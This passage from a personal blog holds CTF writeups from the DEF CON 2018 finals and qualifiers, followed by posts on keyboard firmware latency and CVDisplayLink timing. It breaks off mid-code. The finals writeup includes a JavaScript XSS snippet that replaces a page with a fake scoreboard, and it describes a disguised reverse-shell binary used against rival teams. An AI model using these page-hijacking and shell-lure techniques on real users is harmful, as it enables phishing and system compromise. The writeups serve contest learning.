Then I worked on the actual XSS payload which used a giant inline JS backtick string with our fake scoreboard HTML and a short snippet which overwrote the whole page with our fake one, including a favicon, and also fixed the URL to be just the IP address, knowing nobody would notice the difference between the scoreboard IP address and the challenge IP address:

window.onblur = function() {
    window.history.pushState('scoreboard', 'DC26 CTF', '/');
    document.open();
    document.write(newpage2);
    document.close();
};

While I had been doing all this, bool had whipped up a domain and server to host the XSS and fake challenge payloads, as well as completely replicating the official scoreboard’s appearance but with an extra challenge. He also added a red notice about the new challenge, which hadn’t happened for any of the real challenges, but we figured it made it more likely people would fall into it rather than less. He also set up a server to receive and manage any reverse shell connections we got.

Meanwhile aegis worked on a fake challenge binary that would spin off a reverse shell that would persist even if the challenge binary was killed. For fun he also created a bunch of fake reversing steps that made it seem like an actual challenge binary and made it difficult to notice it was a reverse shell.

By this point it was 4am and we were tired after our 2nd consecutive 20 hour day so we went to sleep. We woke up just before the contest opened again, and I got ready to throw our door closer at our own server manually since we had only automated the throwing at other teams.

But our worst fears came true and total victory was snatched from our grasp by a faster team! I threw the door closer at our own server shortly after opening and found that our canary went through when it shouldn’t. I checked with some other test payloads and sure enough, it seemed that some other team had closed our door on us, presumably after backdooring our server and all the others for themselves. It also turns out the exploit payload had errored in our automated thrower at minute 0 so we hadn’t slipped in to any teams first.

Shortly afterwards the contest organizers realized or were informed of their oversight about persistent exploits and they put in a workaround of restarting the servers every couple minutes to give all teams a chance to slip in. After streamlining my thrower to not be cautious and be faster since clearly lots of other teams knew about the problem and were already leaking their exploits, we managed to regularly slip into a few teams’ servers each restart.

Soon bool started to see hits on his XSS server. We were pretty happy it was finally working. One team even downloaded our fake challenge binary, but unfortunately they don’t seem to have run it.

It wasn’t the glorious victory of monopolizing the flags and owning dozens of machines that we’d dreamed of, but we still got some people and were really proud of our clever plan and exploits. We were really happy when after the contest we talked to one of the organizers and they said they loved our idea and that actually multiple teams had come up to them and asked why the new challenge on the website wasn’t up on the projector screens! The organizer didn’t even realize it was a trick originally and went and asked another organizer if they had released a new challenge accidentally!

reeducation

In the last two hours of the contest, I took a look at the new reeducation challenge. This was an attack/defend binary challenge that appeared to have been written in Rust.

My teammates had already run a Rust demangler on the symbols and had identified some interesting functions, including one with interpret in its name, and determined that we could submit a payload to the service and it would run it through the interpreter.

While they worked on reverse engineering the stages leading to the interpreter I looked at the interpreter in Binary Ninja and used gdb to test the binary and figure out which registers contained the payload and length. I figured out that each “instruction” was two 64 bit words where if the instruction was (a,b) it seemed to execute mem[a] -= mem[b] on the same memory array containing the code (allowing self modification).
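
As an illustration of that instruction format, here is a toy interpreter. It is a sketch of the observed `mem[a] -= mem[b]` behaviour only: straight-line execution, 64 bit wrapping subtraction, and stopping after `max_steps` are all assumptions, since the writeup doesn't cover branching or halting, and the names `run` and `MASK` are made up.

```python
MASK = (1 << 64) - 1  # assumption: arithmetic wraps at 64 bits


def run(mem, max_steps=1000):
    """Execute (a, b) word pairs as mem[a] -= mem[b], modifying mem in place.

    Code and data share one array, so an instruction can rewrite the
    operands of a later instruction before it is fetched.
    """
    pc = 0
    steps = 0
    while pc + 1 < len(mem) and steps < max_steps:
        a, b = mem[pc], mem[pc + 1]
        if a >= len(mem) or b >= len(mem):
            raise IndexError("operand out of bounds")
        mem[a] = (mem[a] - mem[b]) & MASK
        pc += 2
        steps += 1
    return mem
```

In `run([2, 4, 5, 5, 1, 9], max_steps=2)` the first instruction subtracts 1 from the word at index 2, turning the second instruction from `(5, 5)` into `(4, 5)` before it executes.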

I also discovered with gdb that the flag was placed in memory immediately after the submitted code. I also learned from gdb that the length register contained 1024 which was the length of the payload in bytes, but in Binary Ninja I saw the bounds checking code was treating that length as the length in 64 bit words. This allowed the payload to access 8 times the memory it should have been able to without triggering an out of bounds error, including the flag! This looked to be the intended vulnerability, I’m guessing caused by incorrect use of Rust’s unsafe Vec::from_raw_parts or slice::from_raw_parts_mut passing in the byte length instead of the u64 length, an example of how if you use unsafe functions wrong in Rust, it can lead to vulnerabilities!
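
The unit mix-up can be shown with a few lines of arithmetic. This sketch uses the numbers from above (a 1024 byte payload of 64 bit words); the function names are hypothetical and the real check lived in compiled Rust.

```python
WORD_BYTES = 8  # each memory cell is a 64 bit word


def in_bounds_buggy(index, length_register):
    """The check as observed: a word index compared against a byte length."""
    return index < length_register


def in_bounds_fixed(index, length_register):
    """The intended check: convert the byte length to a word count first."""
    return index < length_register // WORD_BYTES


payload_bytes = 1024
payload_words = payload_bytes // WORD_BYTES  # 128 words of actual payload
flag_index = payload_words                   # the flag starts right after the payload
```

With these values `in_bounds_buggy(flag_index, payload_bytes)` is true, while `in_bounds_fixed(flag_index, payload_bytes)` is false, so only the buggy check lets an instruction reach the flag.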

At this point I went and found some teammates in the hotel also working on the problem and shared all the knowledge I hadn’t already posted on Slack. They had figured out that the payload we submitted had to contain only bytes below a certain value. We figured out we had all the knowledge we needed to write an exploit, but we only had 40 minutes of contest left, which was likely not enough.

My teammates started on an exploit script and I helped out occasionally, figuring out that we could use self-modifying code to access offsets that wouldn’t otherwise make it through the byte value filter. Unfortunately we didn’t have enough time to get a working exploit together.

However, while they were working on that I worked on developing a patch. In Binary Ninja I figured out that just underneath the code that initially retrieved the length there was a right shift that divided by 8 for use by some other part of the code. I used Binary Ninja’s patching functionality to fix that code to replace the mov, shr with a shr, mov sequence of the same length that shifted the main length register and then copied it into the other register. The idea was this would fix the length to be the correct length to not allow out of bounds indexing to reach the flag. I posted my 7 byte patch in the Slack channel and one of the people on the floor submitted a patched binary using their better networking 15 minutes before the end of the contest. Unfortunately, the scoreboard was hidden for the final day of the contest so although my patch passed the tests, I don’t know if it actually succeeded in getting us a few extra defense points in the final couple ticks.

Conclusion

I had a ton of fun, and my team (Samurai) ended up coming 11th, which although it isn’t as good as our first place finish in the qualifiers, is pretty good considering how high level the competition at the event was. I think the real victory though was our awesome fake challenge XSS exploit for bew, that was really fun to pull off. I also learned a bunch more about competing in CTFs from my awesome teammates!

Winning the DEF CON Quals CTF! Writeups: Easy Pisy, Flagsifier, Geckome

2018-05-13T00:00:00+00:00

A friend invited me to join his CTF team (Samurai) this year for the Plaid CTF and the DEF CON qualifiers and I thought that sounded fun and wanted to learn more security and reverse engineering, so I did. For Plaid I just spent a couple hours tinkering with a few problems with my main accomplishment being reverse engineering a complicated APL program. For DEF CON I decided to go all out and dedicate my entire weekend to it. I had a really great time, and we won!

I solved three problems mostly by myself: Easy Pisy, Flagsifier and Geckome. The last two were the 6th and 1st least-solved challenges in the game, and the fewer people solved a challenge the more points it was worth. This corresponds a little to how much work was required, but also to how many lucky/clever/random insights are required, and how much effort other teams decided to put in. I’d say Flagsifier was genuinely tricky but Geckome, the least-solved challenge, was mostly luck and good tactics and wasn’t much work compared to many other challenges.

I spent the last 4 hours of the CTF working on a solution to “adamtune”, and I finished a whole bunch of work that did what I intended, it just turned out the results weren’t very good. The way the problem worked it was impossible to tell ahead of time whether my approach would be good enough, so I just had to spend the time and it didn’t pan out. Now that the source has been posted, it seems like my basic approach was correct, and that if I had used the Watson speech to text API instead of the Google one it may have given me the extra info I needed to make a good solution.

I also contributed a bit to discussion and reverse engineering on a few other problems, including “It’s-a me!”, “Tech Support” and “exzendtential-crisis”.

Without further ado, here’s my writeups for the problems that I solved:

Easy Pisy

A web app gave us the ability to sign a PDF and then submit a signed PDF. The source for the PHP scripts and some sample PDFs were accessible. The source and examples showed that the PDFs could contain two possible commands: ECHO and EXECUTE (which runs a shell command). The signing script would only sign ECHO PDFs so you couldn’t trivially execute any command.

Running one of the sample PDFs through showed the commands being run included converting the PDF to a PPM file and then running ocrad (an OCR tool) to extract the text out of them.

One of the example PDFs ran EXECUTE ls and came with a signature; it showed there was a flag file in the working directory.

So the problem was how to get a signed PDF that shows the text EXECUTE cat flag, when we could only sign a PDF that had an ECHO command. This sounded a lot like it could involve the recent-ish PDF SHA1 collision. A quick check of the PHP docs showed that the openssl_verify function they used defaults to using SHA1 signatures!

My teammate fstenv found the https://alf.nu/SHA1 website for generating colliding PDFs, and I quickly opened Pixelmator and drew up one JPEG that said ECHO hi in big Arial font and another that said EXECUTE cat flag. I ran it through the service and it spit out two PDFs with identical hashes. I then went through signing the echo one and executing the cat one and got the flag!

It’s-a Me

This challenge involved a binary that presented text-based menus for a pizza restaurant. A bunch of us opened up the binary in Binary Ninja and IDA and used revsync to collaborate on naming symbols.

We found that it looked for emojis like tomato, pineapple and chicken as the pizza ingredients. If you ordered the Pineapple emoji as an ingredient, it yelled and banned you. We found other pineapple-related code at the cooking stage, so we needed to figure out how to get there without getting banned. Soon aegis figured out the cooking stage concatted the ingredients, so we could split the emoji’s UTF-8 over 2 ingredients to get it through.
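
The splitting trick is easy to demonstrate with plain byte strings. In this sketch `is_banned` and `cook` are hypothetical stand-ins for the binary's ingredient check and cooking stage; only the idea of cutting the emoji's UTF-8 encoding in two comes from the challenge.

```python
PINEAPPLE = "\U0001F34D".encode("utf-8")  # four bytes: f0 9f 8d 8d


def is_banned(ingredient: bytes) -> bool:
    """Stand-in for the order-time check: reject the complete emoji."""
    return PINEAPPLE in ingredient


def cook(ingredients) -> bytes:
    """Stand-in for the cooking stage: concatenate the raw ingredient bytes."""
    return b"".join(ingredients)


# Neither half contains the full four byte sequence on its own.
first, second = PINEAPPLE[:2], PINEAPPLE[2:]
```

Both halves pass `is_banned` individually, but `cook([first, second])` contains the whole pineapple again.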

Then aegis found a code path that could write to a buffer before and after it was free’d, which could be the start of a heap corruption exploit. To get to that path we needed to make it think our pineapple pizzas were all an ApprovedPizza instead of a CriminalPizza.

So we found some bit field logic and aegis figured out that you could overflow the 4 bit fields and make it think all the pizzas were approved by cooking 16 pineapple pizzas and 1 tomato pizza. That let us corrupt the heap and get a segfault. Then kileak developed an exploit which he wrote up here.
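
The wraparound at the heart of this is simple to show. The sketch below only models a count stored in a 4 bit field; how the binary actually used the field, and the role of the extra tomato pizza, are not modelled here, and `count_in_field` is a made-up name.

```python
FIELD_BITS = 4
FIELD_MASK = (1 << FIELD_BITS) - 1  # 0b1111


def count_in_field(n):
    """Store a count in a 4 bit field, silently dropping the higher bits."""
    return n & FIELD_MASK
```

A field like this can hold 0 through 15, so the 16th pineapple pizza wraps the stored count back to 0.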

Flagsifier

This one was tricky: it took me 4 hours of fiddling around in a Jupyter Notebook.

We were given a Keras convnet image classifier model, some sample images showing 38 MNIST-like letters spelling random words glommed together, and the name “Flagsifier”. This suggested that the challenge was to extract an image of the flag from the model trained to recognize the flag.

First I Googled “MNIST letters” and found the EMNIST dataset, which I suspected was what the samples and training data were made with. Next, I had two possible avenues of extraction:

Use something like Deep Dream to optimize an image for flag-ness: this would take a reasonable amount of effort to implement and might work straightforwardly, but ran the risk of outputting blurry or otherwise unreadable images.
Use the letters in the EMNIST dataset to optimize a flag string for flag-ness character by character. This would definitely give a readable result, but I wasn’t sure if just hill-climbing a character at a time would reach the flag properly, since the final dense layer could theoretically learn not to activate basically at all until all the characters are right.

I figured that the second approach had a better effort to expected reward tradeoff and started work. First I set up the data loading code for the EMNIST dataset and extracted only the capital letters (the samples were all uppercase). Then I extracted the first letter from a sample and searched the dataset for it, confirming that the letters were from EMNIST. Later I figured out based on the “L”s in the samples that I needed to use the ByMerge version rather than the ByClass version and switched it.

Next I wrote a function that took a 38-character string and generated an image with random instances of each letter so that I could run things through the network. I needed to figure out which of the 40 class outputs was flag-ness, without having the flag.

The examples I had run through so far had all output 1.0 for one class and 0.0 for others, I figured first I needed more resolution to pick up on hints of flag-ness. To get this I needed to remove the final softmax layer. Unfortunately Keras compiled the model using settings only available inside the load command, so it wasn’t easy to modify it after loading. I took the easy/clever/hacky/fastest way out and opened the model in a hex editor, found the JSON model description inside and changed "softmax", to "linear" , with the space to maintain the length. This gave me a much higher resolution signal to look at and optimize.
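
The same edit can be scripted instead of done by hand in a hex editor. This is a small sketch, assuming the model file contains the `"softmax",` text somewhere in its embedded JSON; `patch_same_length` is a hypothetical helper and it replaces every occurrence it finds.

```python
OLD = b'"softmax",'
NEW = b'"linear" ,'  # extra space keeps the byte count identical


def patch_same_length(data: bytes, old: bytes = OLD, new: bytes = NEW) -> bytes:
    """Replace old with new inside a binary blob without changing its size."""
    if len(old) != len(new):
        raise ValueError("replacement must be exactly as long as the original")
    if old not in data:
        raise ValueError("pattern not found")
    return data.replace(old, new)
```

Keeping the length identical matters because the surrounding file format stores sizes and offsets that would otherwise no longer match.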

I knew that all flags started with OOO so I composed an image with OOO and then blank space, and saw that channel 2 (zero-indexed) had the highest activation.

I started by looping through each character for each position starting from the beginning and filling it with the character that had the highest activation, using my same generator that picked random instances. This gave garbage results, so I made it average the activations of 20 samples for each character and it correctly picked up the OOO and then a bunch of random-seeming characters.

I rewrote my generator and optimizer to pick 30 random versions of each letter for each position and choose the best letter instance for each slot. Then I rewrote it again so it could start from a given string instead of an empty blank canvas. Then I re-ran the optimizer again starting with my last result and it tuned in each character with context.
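
The character-by-character search can be sketched as a greedy loop. This is a simplified illustration, not the notebook code: `score` is a hypothetical callable that renders a candidate string with random letter instances and returns the flag-ness activation, and the sketch only covers the averaging variant and the option to start from an earlier result, not the later version that kept the best letter instance per slot.

```python
import string


def hill_climb(score, length, start=None, samples=20,
               alphabet=string.ascii_uppercase):
    """Greedily pick, position by position, the letter with the best average score.

    score(text) is assumed to be noisy (each call may render different
    letter images), so it is averaged over `samples` calls per candidate.
    """
    current = list(start) if start is not None else [" "] * length
    for pos in range(length):
        best_char, best_avg = current[pos], float("-inf")
        for ch in alphabet:
            text = "".join(current[:pos] + [ch] + current[pos + 1:])
            avg = sum(score(text) for _ in range(samples)) / samples
            if avg > best_avg:
                best_char, best_avg = ch, avg
        current[pos] = best_char
    return "".join(current)
```

Passing the previous output back in as `start` re-tunes each position with the rest of the string as context.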

This gave me OOOSOMGAUTHKNTICIWTTILIGCWCCISRTQUIVCT. That looked like the first part might be OOOSOMEAUTHENTIC, it was getting somewhere! So I posted it to the Samurai Slack channel. I was somewhat tapped out of ideas and my teammate wanted to try Deep Dream, so I tried a bit harder to get the best guess of a starting point for Deep Dream to optimize. I noted that the ByMerge dataset meant L and I were nearly indistinguishable, and given that and the context of an AI challenge it probably continued OOOSOMEAUTHENTICINTELLIGENCEIS. I couldn’t decipher the last bit though so I prepared to wait for the deep dream results.

Then I got a Slack ping that the challenge had been solved: my teammate shane had figured out that the last bit RTQUIVCT must be REQUIRED! We had managed to turn the garbled mess into the full flag.

Geckome

In this challenge there was a page with Javascript that collected a bunch of info from the browser, put it all in a string, hashed it, and if it had the correct hash, passed it off to a PHP file that would give you the flag given the string.

We started by looking at the various Javascript, CSS and HTML features used on the page and tabulating which versions of which browsers could possibly have that combination of features, and came up with this table:

Thing           Firefox Chrome  Opera   Safari
onbeforeprint   <6      <63     <50     any
DataView        >=15    >=9     >=12.1  >=5.1
webkit anim     X       >=4     >=15    >=4
SubtleCrypto    >=34    >=37    >=24    >=11
link prerender  X       >=13    >=15    X
video tag       >=20    >=4     >=11.5  >=4
ping attr       X       >=15    >=15    >=6

The version expressions for onbeforeprint are
the browsers that don't support it, as suggested.

This didn’t do much except rule out Firefox and Safari. We could also probably rule out Opera because it’s rare, and the challenge was named “Geckome” which had “ome” from Chrome, but nothing from Opera. But there were still too many Chrome versions.

I modified the script to put all the important values to hash on the screen so that we could easily look at the results in different browsers:

<pre id="log"></pre>
<script>
    var logText = "";
    function logme(thing,s) { logText += thing; logText += ": "; logText += String(s); logText += ";\n";}

    var f = "";
    if (navigator.onLine)
        f += "o";
    logme("online", navigator.onLine);
    f += navigator.vendor;
    logme("vendor", navigator.vendor);
    function p() {
        window.print();
    }

    f += navigator.mimeTypes.length;
    logme("mimes", navigator.mimeTypes.length);
    x=0; for ( i in navigator ) { x += 1; } f += x;
    logme("navlen", x);
    x=0; for ( i in window ) { x += 1; } f += x;
    logme("winlen", x);
    // hash
    function str2ab(str) {
        var buf = new ArrayBuffer(str.length*2); // 2 bytes for each char
        var bufView = new Uint16Array(buf);
        for (var i=0, strLen=str.length; i<strLen; i++) {
            bufView[i] = str.charCodeAt(i);
        }
        return buf;
    }
    function sha256(str) {
        // We transform the string into an arraybuffer.
        var buffer = str2ab(str);
        return crypto.subtle.digest({name:"SHA-256"}, buffer).then(function (hash) {
            return hex(hash);
        });
    }

    function hex(buffer) {
        var hexCodes = [];
        var view = new DataView(buffer);
        for (var i = 0; i < view.byteLength; i += 4) {
            // Using getUint32 reduces the number of iterations needed (we process 4 bytes each time)
            var value = view.getUint32(i)
            // toString(16) will give the hex representation of the number without padding
            var stringValue = value.toString(16)
            // We use concatenation and slice for padding
            var padding = '00000000'
            var paddedValue = (padding + stringValue).slice(-padding.length)
            hexCodes.push(paddedValue);
        }

        // Join all the hex strings into one
        return hexCodes.join("");
    }
    if(navigator.plugins.length > 0) {
        logme("plugin0name", navigator.plugins[0].filename);
        logme("plugin0desc", navigator.plugins[0].description);
    }
    if(navigator.plugins.length > 1) {
        logme("plugin1name", navigator.plugins[1].filename);
        logme("plugin1desc", navigator.plugins[1].description);
    }
    f += navigator.plugins[0].filename;
    f += navigator.plugins[1].description;

    logme("f", f);

    sha256(f).then(function(digest) {
        logme("digest", digest)
        if (digest == "31c6b7c46ff55afc8c5e64f42cc9b48dde6a04b5ca434038cd2af8bd3fd1483a") {
            logme("flag", "gotit!");
        } else {
            logme("flag", "fail!");
        }
        document.getElementById('log').innerHTML = logText;
    });
</script>

I then hosted a version of this and used BrowserShots to take screenshots of it in many versions. Most crashed for lack of various APIs/values and none were correct.

My next idea was to brute force the hash by trying all the reasonable combinations of numbers and plugin strings.

I spent an hour writing a Rust program to brute force it that computed the strings and digests in the same way, including UTF-16 conversion and converting to hex. Then I checked that it could find the values for my browser’s digest. I entered a lot of possible plugin values and reasonable ranges for numbers based on the browser screenshots, but couldn’t find the correct one despite searching millions of combinations.

So, I gave up. Then later I got a Slack ping that my teammate nopple had solved it. He had taken my Rust program and added some extra plugin strings I had missed from the browser screenshots (libpepflashplayer.so turned out to be the key).

extern crate byteorder;
extern crate sha2;

use sha2::{Sha256, Digest};
use byteorder::{LittleEndian, WriteBytesExt};
use std::fmt::Write;

fn to_utf16(s: &str) -> Vec<u8> {
    let mut out = Vec::with_capacity(s.len()*2);
    for point in s.encode_utf16() {
        out.write_u16::<LittleEndian>(point).unwrap();
    }
    out
}

fn to_hex(bytes: &[u8]) -> String {
    assert_eq!(bytes.len(), 32);
    let mut s = String::with_capacity(64);
    for byte in bytes {
        write!(&mut s, "{:02x}", byte).unwrap();
    }
    s
}

fn hash(bytes: &[u8]) -> String {
    let mut hasher = Sha256::default();
    hasher.input(bytes);
    let output = hasher.result();
    to_hex(output.as_slice())
}

#[derive(Debug)]
struct Browser {
    online: bool,
    vendor: &'static str,
    mimes: u16,
    navs: u16,
    wins: u16,
    plug_name: &'static str,
    plug_desc: &'static str,
}

fn construct_f(b: &Browser) -> String {
    let mut s = String::with_capacity(64);
    if b.online { s.push('o'); }
    s.push_str(b.vendor);
    write!(&mut s, "{}", b.mimes).unwrap();
    write!(&mut s, "{}", b.navs).unwrap();
    write!(&mut s, "{}", b.wins).unwrap();
    s.push_str(b.plug_name);
    s.push_str(b.plug_desc);
    s
}

// Test target that's my browser
// const TARGET: &'static str = "31504a9568837f94e9f0afe8387cf945fb4929b81e53caf16bdf65c417e294e0";
// Real target
const TARGET: &'static str = "31c6b7c46ff55afc8c5e64f42cc9b48dde6a04b5ca434038cd2af8bd3fd1483a";

fn test(f: &str) -> bool {
    let utf16 = to_utf16(f);
    let hex_hash = hash(&utf16[..]);
    assert_eq!(hex_hash.len(), 64);
    hex_hash == TARGET
}

struct ForceConfig {
    navs_start: u16,
    navs_end: u16,
    wins_start: u16,
    wins_end: u16,
}

const PLUGNAMES: &'static [&'static str] = &[
    "internal-remoting-viewer",
    "internal-pdf-viewer",
    "widevinecdmadapter.plugin",
    "PepperFlashPlayer.plugin",
    "internal-nacl-plugin",
    "libpdf.so",
    "pepflashplayer.dll",
    "Flash Player.plugin",
    "WebEx64.plugin",
    "CitrixOnlineWebDeploymentPlugin.plugin",
    "googletalkbrowserplugin.plugin",
    "AdobePDFViewerNPAPI.plugin",
    "libpepflashplayer.so",
];

const PLUGDESCS: &'static [&'static str] = &[
    "",
    "This plugin allows you to securely access other computers that have been shared with you. To use this plugin you must first install the <a href=\"https://chrome.google.com/remotedesktop\">Chrome Remote Desktop</a> webapp.",
    "Portable Document Format",
    "Enables Widevine licenses for playback of HTML audio/video content. (version: 1.4.9.1070)",
    "Plugin that detects installed Citrix Online products (visit www.citrixonline.com).",
    "Shockwave Flash 9.0 r0",
    // SNIPPED: versions 10 through 28. These didn't end up being necessary.
    "Shockwave Flash 29.0 r0",
];

fn force(c: &ForceConfig) {
    let num_navs = (c.navs_end-c.navs_start) as usize;
    let num_wins = (c.wins_end-c.wins_start) as usize;
    let max_mime: u16 = 15;

    let total = num_navs*num_wins*(max_mime as usize-1)*PLUGNAMES.len()*PLUGDESCS.len();
    println!("Brute forcing {} combinations", total);

    let one_segment = total / 100;
    let mut tick = 0;

    for navs in c.navs_start..c.navs_end {
        for wins in c.wins_start..c.wins_end {
            for mimes in 1..max_mime {
                for plug_name in PLUGNAMES {
                    for plug_desc in PLUGDESCS {
                        let b = Browser {
                            online: true,
                            // vendor: "",
                            vendor: "Google Inc.",
                            // vendor: "Opera Software ASA",
                            mimes, navs, wins, plug_name, plug_desc,
                        };
                        let f = construct_f(&b);
                        let good = test(&f);
                        assert!(!good, "{:?}", b);

                        tick += 1;
                        if tick % one_segment == 0 {
                            println!("Done {}/{}", tick, total);
                        }
                    }
                }
            }
        }
    }
}

fn main() {
    let conf = ForceConfig {
        navs_start: 8,
        navs_end: 58,
        wins_start: 80,
        wins_end: 270,
    };
    force(&conf);
}

AdamTune

This challenge involved passing a “voice print” test where you submitted an MP3 file that was allegedly Adam Doupé reading a sentence.

My teammates spent some time training a text-to-speech model on a small hand-labeled dataset, but that didn’t produce good enough results, and with 4 hours left in the contest we agreed there was no way it could work in time.

By recording challenges from the demo server, I discovered that a vocabulary of about 209 words completely covered most challenges. So we decided to try a concatenative approach. My teammates downloaded the audio for a bunch of Adam’s talks and gave me cut up mono wav files. I fed these through the Google Speech To Text API and got word level timing information. I wrote a script that cut out wav files of individual words in the vocabulary from the transcript, a script that picked out the best instances of these words based on length and volume, and a script that strung together the best instances into sentences.
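As a rough sketch of the "pick the best instance of each word, then string them together" steps: the record layout, the millisecond units and the scoring rule below (prefer clips near the word's median duration, break ties by volume) are assumptions made for illustration, not the scripts used in the contest, which operated on real wav files and Speech To Text output.

```python
from collections import defaultdict
from statistics import median

# Hypothetical record for one recognized word:
# (word, start_ms, end_ms, mean_volume). Only the bookkeeping is modelled here.

def pick_best_clips(timings):
    """Choose one clip per word: closest to that word's median duration, louder wins ties."""
    by_word = defaultdict(list)
    for word, start, end, volume in timings:
        by_word[word.lower()].append((start, end, volume))

    best = {}
    for word, clips in by_word.items():
        typical = median(end - start for start, end, _ in clips)
        # Assumed scoring: penalize unusual durations (rushed or dragged-out words),
        # then prefer higher volume (less likely to be muttered).
        best[word] = min(clips, key=lambda c: (abs((c[1] - c[0]) - typical), -c[2]))
    return best

def plan_sentence(sentence, best):
    """Return the (start_ms, end_ms) cuts to concatenate, or None if a word is missing."""
    plan = []
    for word in sentence.lower().split():
        if word not in best:
            return None
        start, end, _ = best[word]
        plan.append((start, end))
    return plan
```

A sentence containing a word outside the collected vocabulary yields `None`, which corresponds to the challenges the vocabulary did not cover.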

However, the results sounded really bad. A lot of the words were said quickly, muttered, or included bits of other words, so the results ended up being really difficult to understand.

I submitted it anyway and it actually passed the check that it said the right words, but failed the classifier that it was Adam. This was the opposite of what I expected, since it was Adam but didn’t sound like it was saying the sentence cleanly.

Looking at the source after the contest, it seems the approach used in it is very similar, except with the Watson speech API, which gives word-level confidences that Google doesn’t. That allows better filtering, and it might also give better timestamps for less choppy cutouts.

My other guess for why we failed the classifier is that we used clips from Adam’s livestreams doing pwnables instead of from his CS lectures. These sound very different because of different microphones and styles of speaking. We chose the pwnables because the audio was higher quality, but if the classifier used only lectures then that could easily explain why we failed it.

Fixing My Keyboard's Latency

2017-12-29T00:00:00+00:00

While discussing Dan Luu’s keyboard latency experiments I realized that I had never tested my keyboard’s latency. I use a custom keyboard I designed and built, but when I wrote the firmware I was focused on getting it working and didn’t pay any attention to latency. When I took a look at the source code and immediately saw a 10ms delay that was there for no other reason than paranoia, I knew I was in for some fun.

After a bunch of measuring, finding and squashing sources of latency, I managed to improve the latency of the main loop from 30 milliseconds to 700 microseconds. I then added a feature that changed the colour of the keyboard’s RGB LEDs on every key press so that I could use the Is It Snappy app with my iPhone’s high speed camera mode to do some latency testing.

The first thing I found was that with my improved firmware the end-to-end latency of typing a character in Sublime Text and Xcode 9 near the top of my Macbook display is around 42ms¹. This is pretty good, but the astonishing thing is that it means that before I fixed the firmware my keyboard used to account for almost half of my end-to-end typing latency. This is measured from the LED colour change, so it doesn’t count the roughly 15ms¹ (according to my testing) between starting to press one of my keys and the switch activating.

I also tested my Macbook keyboard, as well as a few older low speed USB Apple keyboards, and found that they had around 67ms¹ of end-to-end latency, measuring from when the switch was fully depressed while hitting the key as fast as I could. I suspect part of the reason for this is that these keyboards only poll at 8ms and 10ms intervals according to USB Prober (an old Apple dev tool), whereas the Teensy in my custom keyboard polls every millisecond. According to Dan’s post newer Apple external keyboards also poll at 1000hz.

Note that the 700us main loop doesn’t translate into 700us switch-to-USB latency, since the USB transfer is done asynchronously via DMA by the Teensy’s USB controller when it is polled, which happens at 1000hz.

It’s interesting that I used my keyboard for 3 years without noticing that it added 30ms of latency. I have a few guesses why:

Although I can perceive 30ms of latency in a comparison test, I have to pay attention. My keyboard having 30ms of extra latency just made it feel different, but that’s unsurprising since it was different in a bunch of ways.
My only comparison was other high-latency keyboards, like my Macbook’s. 30ms of latency difference is more perceptible than 5-10ms.

Anyhow here’s how I managed to bring the latency down from 30ms to 700us:

I added some measurement code that printed the time spent in the main loop to the Serial console after every key press. This gave me the 30ms figure.
I removed the 10ms delay in the main loop, and everything still worked.
I searched for other delays and found one 2ms one between enabling a row for scanning and reading it, which I removed with no apparent consequences. I added back in a 2 microsecond delay just in case.
I had tried to make the display on my keyboard only update when it changed, but I messed this up somewhere else and it was taking 5ms to update on every key press.
The right half of my keyboard is scanned using an I/O expander over i2c since I didn’t have enough pins on the Teensy. This is the same way the two halves of the Ergodox work. Based on some Ergodox firmware I saw, I reinitialized the direction registers of the I/O expander before every scan, just in case. Unfortunately this added 2ms and wasn’t really necessary since unlike the Ergodox you can’t disconnect the second half of my keyboard with a cable.
Now my loop was taking 3.8ms which was almost entirely the i2c communication with the I/O expander. A friend recommended I check out nox771’s fast i2c library. Unfortunately, it wouldn’t compile on the super old version of the Arduino/Teensyduino software I was using. I decided to upgrade, and after several hours in C++ compilation hell and accounting for a few changes, it worked. I bumped the i2c frequency up to 1.8 megahertz and now my loops took 700us!
Now I started running into bouncing problems that led to the occasional doubled letter, so I needed to implement debouncing. Some ways of implementing debouncing add latency but that’s totally unnecessary. I implemented a simple technique that sends transitions immediately and then doesn’t update a key for 5ms after.
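The debouncing technique from the last step (report a transition immediately, then ignore that key for 5ms) can be sketched as follows. This is a minimal model in Python rather than the actual firmware code; the class and method names are made up for illustration.

```python
DEBOUNCE_MS = 5  # lockout window mentioned in the post

class Debouncer:
    """Report a key transition immediately, then ignore that key for DEBOUNCE_MS."""

    def __init__(self, num_keys):
        self.state = [False] * num_keys      # last reported state per key
        self.locked_until = [0] * num_keys   # time (ms) before which changes are ignored

    def update(self, key, raw_pressed, now_ms):
        """Feed one raw reading; return the new state if a transition is reported, else None."""
        if now_ms < self.locked_until[key]:
            return None  # still inside the lockout window: treat as bounce
        if raw_pressed == self.state[key]:
            return None  # no change since the last reported state
        self.state[key] = raw_pressed
        self.locked_until[key] = now_ms + DEBOUNCE_MS
        return raw_pressed
```

Because the first edge is reported without waiting for the signal to settle, this adds no latency to a key press. The cost is that a genuine release within 5ms of a press is only noticed on the first scan after the window ends.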

The specifics are only relevant to other people building keyboard firmware, especially the fast i2c one which I don’t think most ErgoDox firmwares use. But I think it’s interesting to see how easy it was to improve the latency of software that wasn’t designed for it with only a few hours of work.

¹ I use an iPhone 5S, which can only record at 120fps, so while these numbers are consistent over multiple measurements, they may be off by as much as 8ms.

CVDisplayLink Doesn't Link To Your Display

2017-12-09T00:00:00+00:00

Edit 2017/12/10: So I screwed up, I thought I was safe confirming it in two different ways but I was using an external monitor and all of the below is accurate only for a specific multi-monitor case. Skip to the bottom to read about my new results.

CVDisplayLink is the recommended way to synchronize your drawing/animation with the refresh of the display on macOS. Many people assume it calls your app just after each display vsync event. Unfortunately, this isn’t the case at all. CVDisplayLink just fetches the refresh rate of your display, and sets a high resolution timer to call you every 16.6ms (for a 60Hz display).

The major reason this is important is if your app has inconsistent rendering times and you get unlucky with the phase of your events, you’ll end up painting twice in some frames and zero times in others, leading to visible dropped frames in your animations. As illustrated by @jordwalke on Twitter:

This is particularly insidious because depending on how variable your draw times are, a lot of the time you’ll end up with consistent drawing, but every N runs it will be really bad. Even worse, your FPS measurements will still show 60fps because you’re still drawing every 16.6ms.
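To make the phase problem concrete, here is a small simulation of a free-running 16.6ms timer against vsync intervals. It is a toy model, not anything derived from CoreVideo: the function name, the microsecond units and the alternating 4ms/8ms render times are all assumptions chosen for illustration.

```python
FRAME_US = 16_600  # one 60Hz refresh, in microseconds

def paints_per_frame(phase_us, render_times_us, num_frames):
    """Count how many draws finish inside each vsync interval.

    The timer fires every FRAME_US, starting phase_us after a vsync;
    draw i takes render_times_us[i % len(render_times_us)] to finish.
    """
    counts = [0] * num_frames
    for i in range(num_frames):
        fired = phase_us + i * FRAME_US
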